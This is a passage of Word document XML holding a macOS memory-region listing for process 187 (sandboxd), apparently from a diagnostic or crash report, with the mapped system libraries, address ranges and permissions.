    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff9524b000-00007fff95255000 [   40K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGFXShared.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff95255000-00007fff954be000 [ 2468K] r-x/r-x SM=COW  /System/Library/Frameworks/Security.framework/Versions/A/Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff95533000-00007fff95539000 [   24K] r-x/r-x SM=COW  /usr/lib/system/libunwind.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff9553c000-00007fff95545000 [   36K] r-x/r-x SM=COW  /usr/lib/libMatch.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fff95545000-00007fff95548000 [   12K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libCVMSPluginSupport.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff95548000-00007fff95551000 [   36K] r-x/r-x SM=COW  /usr/lib/system/libcopyfile.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff955d2000-00007fff955d5000 [   12K] r-x/r-x SM=COW  /usr/lib/system/libsystem_configuration.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff95c3f000-00007fff95c91000 [  328K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff95d16000-00007fff95d40000 [  168K] r-x/r-x SM=COW  /usr/lib/libxslt.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff95e15000-00007fff95f81000 [ 1456K] r-x/r-x SM=COW  /System/Library/Frameworks/AudioToolbox.framework/Versions/A/AudioToolbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff9602d000-00007fff9643b000 [ 4152K] r-x/r-x SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libLAPACK.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff96470000-00007fff96477000 [   28K] r-x/r-x SM=COW  /usr/lib/system/libsystem_networkextension.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff96628000-00007fff967b7000 [ 1596K] r-x/r-x SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libBLAS.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff967cb000-00007fff967e6000 [  108K] r-x/r-x SM=COW  /System/Library/Frameworks/Kerberos.framework/Versions/A/Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff96907000-00007fff96915000 [   56K] r-x/r-x SM=COW  /usr/lib/libxar.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff9691e000-00007fff96c52000 [ 3280K] r-x/r-x SM=COW  /usr/lib/libmecabra.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff96c97000-00007fff96d8a000 [  972K] r-x/r-x SM=COW  /usr/lib/libxml2.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff9729e000-00007fff972b9000 [  108K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/AppleVPA.framework/Versions/A/AppleVPA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff97390000-00007fff973c1000 [  196K] r-x/r-x SM=COW  /usr/lib/system/libsystem_m.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff9740a000-00007fff97436000 [  176K] r-x/r-x SM=COW  /usr/lib/libarchive.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff97436000-00007fff974cc000 [  600K] r-x/r-x SM=COW  ...tem/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ColorSync.framework/Versions/A/ColorSync</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff97519000-00007fff975b8000 [  636K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/Metadata.framework/Versions/A/Metadata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__UNICODE              00007fff9768c000-00007fff97714000 [  544K] r--/r-- SM=COW  /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__LINKEDIT             00007fff97a1f000-00007fff9c034000 [ 70.1M] r--/r-- SM=COW  dyld shared cache combined __LINKEDIT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">VM_ALLOCATE            00007fffffe00000-00007fffffe01000 [    4K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">shared memory          00007fffffe5e000-00007fffffe5f000 [    4K] r-x/r-x SM=SHM  </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lastRenderedPageBreak/>
        <w:t>==== Writable regions for process 187</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00000001079ed000-00000001081f0000 [ 8204K] rw-/rwx SM=PRV  /usr/libexec/sandboxd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">Kernel Alloc Once      00000001081f5000-00000001081f6000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">MALLOC                 00000001081f7000-00000001081f8000 [    4K] rw-/rwx SM=ZER  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">MALLOC                 00000001081f9000-000000010820e000 [   84K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">MALLOC                 0000000108210000-0000000108225000 [   84K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>Stack                  0000000108228000-000000010823a000 [   72K] rw-/rwx SM=PRV  thread 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">VM_ALLOCATE            000000010823a000-000000010823e000 [   16K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">VM_ALLOCATE            000000010823f000-0000000108240000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>Stack                  00000001082c3000-0000000108345000 [  520K] rw-/rwx SM=PRV  thread 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">MALLOC                 00000001083c9000-00000001083ca000 [    4K] rw-/rwx SM=ZER  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">MALLOC                 00000001083cb000-00000001083e0000 [   84K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">MALLOC                 00000001083e2000-00000001083f7000 [   84K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">Dispatch continuations 0000000108400000-0000000108800000 [ 4096K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>MALLOC_TINY            00007fb2c3400000-00007fb2c3600000 [ 2048K] rw-/rwx SM=PRV  DefaultMallocZone_0x1081f6000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>MALLOC_SMALL           00007fb2c3800000-00007fb2c4800000 [ 16.0M] rw-/rwx SM=PRV  DefaultMallocZone_0x1081f6000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack                  00007fff57a1c000-00007fff5821b000 [ 8188K] rw-/rwx SM=ZER  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack                  00007fff5821b000-00007fff5821c000 [    4K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff6d2f5000-00007fff6d2f8000 [   12K] rw-/rwx SM=PRV  /usr/lib/dyld</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff6d2f8000-00007fff6d32e000 [  216K] rw-/rwx SM=COW  /usr/lib/dyld</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77c84000-00007fff77c85000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/login.framework/Versions/A/Frameworks/loginsupport.framework/Versions/A/loginsupport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77cad000-00007fff77caf000 [    8K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/OAuth.framework/Versions/A/OAuth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77caf000-00007fff77cb1000 [    8K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77cbb000-00007fff77cbf000 [   16K] rw-/rwx SM=COW  /usr/lib/system/libsystem_pthread.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fff77d07000-00007fff77d75000 [  440K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreData.framework/Versions/A/CoreData</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77d75000-00007fff77d79000 [   16K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/LanguageModeling.framework/Versions/A/LanguageModeling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
